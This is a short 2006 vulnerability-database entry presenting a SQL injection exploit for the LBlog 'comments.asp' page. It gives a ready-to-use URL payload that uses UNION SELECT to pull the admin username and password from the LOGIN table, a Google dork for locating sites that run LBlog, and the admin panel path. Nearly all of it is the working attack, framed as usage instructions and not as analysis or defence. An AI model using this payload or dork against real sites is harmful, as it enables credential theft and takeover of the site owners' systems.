LBlog <= "comments.asp" SQL Injection Exploit

2006-08-21T00:00:00
ID SECURITYVULNS:DOC:13976
Type securityvulns
Reporter Securityvulns
Modified 2006-08-21T00:00:00

Description

LBlog <= "comments.asp" SQL Injection Exploit

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Credit by | Chironex Fleckeri

Mail | ChironeX.FleckeriX@Gmail.Com

Googledork | Powered By LBlog

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT 0,username,password,3,4+FROM+LOGIN+WHERE+ID=1

Admin Panel : http://www.target.com/path/admin